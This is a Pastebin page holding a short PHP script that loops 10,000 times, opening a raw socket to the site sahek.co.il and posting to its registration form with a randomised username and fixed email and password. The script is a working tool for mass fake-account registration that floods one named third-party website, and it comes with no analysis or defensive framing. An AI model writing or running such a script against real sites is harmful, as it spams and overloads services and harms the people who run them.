Advertisement
Guest User

Untitled

a guest
Aug 13th, 2017
59
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 0.51 KB | None | 0 0
  1. <?php
  2. set_time_limit(0);
  3. for($i = 0; $i < 10000; $i++) {
  4. $rand = rand();
  5. $fp = fsockopen("sahek.co.il", "80");
  6. $thingy = "username=kokonuts$rand&email=a1631245%40jnxjn.com&password=123456&password2=123456&Submit=%D7%94%D7%A8%D7%A9%D7%9E%D7%94";
  7. $header = "POST /index.php?task=register&done=1 HTTP/1.1\r\n";
  8. $header .= "Host: sahek.co.il\r\n";
  9. $header .= "Content-Type: application/x-www-form-urlencoded\r\n";
  10.  
  11. $header .= "Content-Length: " . strlen($thingy) . "\r\n\r\n";
  12. fwrite($fp, $header . $thingy);
  13. }
  14. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement